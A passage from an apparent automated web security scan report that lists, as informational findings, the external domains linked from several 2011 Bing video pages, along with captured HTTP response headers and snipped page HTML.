Expires: Sun, 30 Jan 2011 17:12:11 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:32 GMT
Connection: close
Set-Cookie: _SS=SID=A47CDA870BE940568F31C0941DBE5A19; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb437b881f8a1493fa95a9a91585bf2f1; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fmichaels-new-friend%2f17w7aehdt%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/the-office" data-instName="InfoRelatedLinks">Hulu - The Office</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/watch?content_id=50117565" data-instName="InfoRelatedLinks">Hulu Watch Page - Michael's New Friend</a>
...[SNIP]...
class="motionThumb playerUrl"
title="The Office is so successful that Ricky doesn't know how many productions there are of it." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=5bd07dd9-3590-4484-9621-391b29a1d90b&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ase of new comedy 'The Invention Of Lying', we look at the world according to Ricky "The Office" Gervais." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=215589a9-1f97-49ed-b669-0060f611c09e&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
the creator of the original BBC series, makes a surprise guest appearance on the American version starring Steve Carrell." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=3468c015-6b46-4a4f-b5db-eb9787d7f766&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
earance on The Tonight Show and asks about Steve Carells decision to leave "The Office"  after next season." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=3cbead54-c048-4526-afe2-2b3b7f49ded7&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
=ricky%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="WatchMojo.com takes a look at the career of British comedian Ricky Gervais." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=c9d40bcc-d4a5-4d79-8883-8175e2c77d29&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
"
title="The British funnyman brings his UK "Office" character overseas to go toe-to-toe with Steve Carell. See it!" >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=121a8355-038a-40be-881e-7f6760f462e9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
cky-gervais-out-of-the-office/17wu9a705?q=ricky%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="Ricky has done a lot to get to this point." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=32ae1673-79d7-4501-bf2e-8f88e11f04d0&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
y%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="Slurring is part of the English colloquialisms that makes the shows so real." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=2603b9e3-bb75-4d93-86a8-34cf8b5813e6&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
deo/ricky-gervais-on-james-lap/17wx0ych1?q=ricky%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="Ricky realizes it is as awkward as it sounds." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=3566f221-6c01-4fb5-b8d1-4cca2d344157&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
class="motionThumb playerUrl"
title="Rickt Gervais talks to Jimmy about April Fool's Day and the many spin-offs of The Office." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=bea14d33-fd5b-496c-b0c1-70e719829103&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.409. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=162a3a96-51bd-433d-9f2f-02ce47f429d4&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=ff066e8d-2b84-472e-8440-7780d7f70087&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=25d6772e-5c80-4e8d-a39f-0657c9f029aa&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=72f2e4f2-bac8-45a0-9db6-27a20d876b0c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=8ae02a9d-ad6e-4eba-b96d-0a4657d77100&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=b353d884-39d7-4d6b-983f-2fb9b9465fd0&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.redacted/Image.aspx?uuid=747584ee-7da2-436e-b444-d7782c7b985a&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=922ed11b-a21d-4233-8927-8491c0f7a764&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=f062983e-76c8-4204-8870-1c92bac74c27&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=2cdbcfb1-944f-43d9-b168-a5519581f5fb&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=6655be07-f15e-4ca5-9397-d6d318a0017b&w=400&h=300&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fnews-9-makes-sure-you-know-its-snowing%2f1d07cesck%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.redacted/
http://www.wmur.com/
http://www.wmur.com/video/26532804/index.html
http://www.wmur.com/video/index.html

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 109040
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.578 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:38 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=189D8011DB3941A584C4CAEF4613E7B3; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c47c05fe66c744af789142972f6f75ef7; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:38 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck" /><link rel="image_src" href="http://img4.catalog.video.redacted/Image.aspx?uuid=6655be07-f15e-4ca5-9397-d6d318a0017b&w=400&h=300&so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fnews-9-makes-sure-you-know-its-snowing%2f1d07cesck%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.wmur.com/video/26532804/index.html" data-instName="InfoRelatedLinks">Click here to watch</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.wmur.com/video/index.html" data-instName="InfoRelatedLinks">Click here for more video</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.wmur.com/" data-instName="InfoRelatedLinks">Click here to visit WMUR</a>
...[SNIP]...
recast-6-30-pm-january-29-2011/1d2demk6i?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Weather Forecast -- 6:30 PM -- January 29, 2011" >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=b353d884-39d7-4d6b-983f-2fb9b9465fd0&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ch/video/pm-weather-forecast-12911/1d25ut704?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Get the latest weather forecast from Doug Kammerer." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=2cdbcfb1-944f-43d9-b168-a5519581f5fb&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
recast-7-30-am-january-28-2011/1d202ry03?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Weather Forecast -- 7:30 AM -- January 28, 2011" >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=747584ee-7da2-436e-b444-d7782c7b985a&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
recast-8-30-am-january-26-2011/1d2ays3u1?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Weather Forecast -- 8:30 AM -- January 26, 2011" >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=162a3a96-51bd-433d-9f2f-02ce47f429d4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
class="motionThumb playerUrl"
title="Rain on Sunday + your 7 Day Outlook.  More Weather updates @ www.facebook.com/PabloNBCLA." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=ff066e8d-2b84-472e-8440-7780d7f70087&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ather-forecast-11-am-january-28-2011/1d2xikuhi?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Weather Forecast -- 11 AM -- January 28, 2011" >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=f062983e-76c8-4204-8870-1c92bac74c27&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
recast-8-30-am-january-27-2011/1d273cnd6?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Weather Forecast -- 8:30 AM -- January 27, 2011" >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=25d6772e-5c80-4e8d-a39f-0657c9f029aa&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
her-forecast-6-30-pm-june-27-2010/1d2fjlamo?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Weather Forecast -- 6:30 PM -- June 27, 2010" >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=922ed11b-a21d-4233-8927-8491c0f7a764&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
st&rel=MSN" class="motionThumb playerUrl"
title="NBC Connecticut meteorologist Darren Sweeney provides a look at the saturday daytime forecast." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=8ae02a9d-ad6e-4eba-b96d-0a4657d77100&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
pm-weather-forecast-01-28-11/1d2glbmb6?q=Weather%20Forecast&rel=MSN" class="motionThumb playerUrl"
title="Get the latest forecast from meteorologist Doug Kammerer." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=72f2e4f2-bac8-45a0-9db6-27a20d876b0c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.410. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://images.video.msn.com/flash/customPlayer/1_0/customPlayer.swf?player.v=390a5af2-fac2-4e20-8b6e-4cc518d71596&player.fullscreen=false&player.ap=true&mkt=en-US&configName=syndicationplayer&configCsid=msnvideo
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img4.catalog.video.redacted/Image.aspx?uuid=390a5af2-fac2-4e20-8b6e-4cc518d71596&w=400&h=300&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://mail.live.com/
http://movies.redacted/
http://movies.redacted/comingsoon
http://movies.redacted/movies/movie.aspx?m=2278080
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2frio-exclusive-films-first-two-minutes%2f5eq4owv%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.redacted/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 77783
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:17:39 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:02:39 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=B48B65D00BAF403892E682EAA8E2B594; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c33acc47a03c24f7995d266e4fbbb34ac; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv" /><link rel="video_src" href="http://images.video.redacted/flash/customPlayer/1_0/customPlayer.swf?player.v=390a5af2-fac2-4e20-8b6e-4cc518d71596&player.fullscreen=false&player.ap=true&mkt=en-US&configName=syndicationplayer&configCsid=msnvideo" type="" title="" /><link rel="image_src" href="http://img4.catalog.video.redacted/Image.aspx?uuid=390a5af2-fac2-4e20-8b6e-4cc518d71596&w=400&h=300&so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2frio-exclusive-films-first-two-minutes%2f5eq4owv%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://movies.redacted/movies/movie.aspx?m=2278080" data-instName="InfoRelatedLinks">Learn more about 'Rio'</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://movies.redacted/comingsoon" data-instName="InfoRelatedLinks">Coming Soon</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://movies.redacted/" data-instName="InfoRelatedLinks">MSN Movies</a>
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
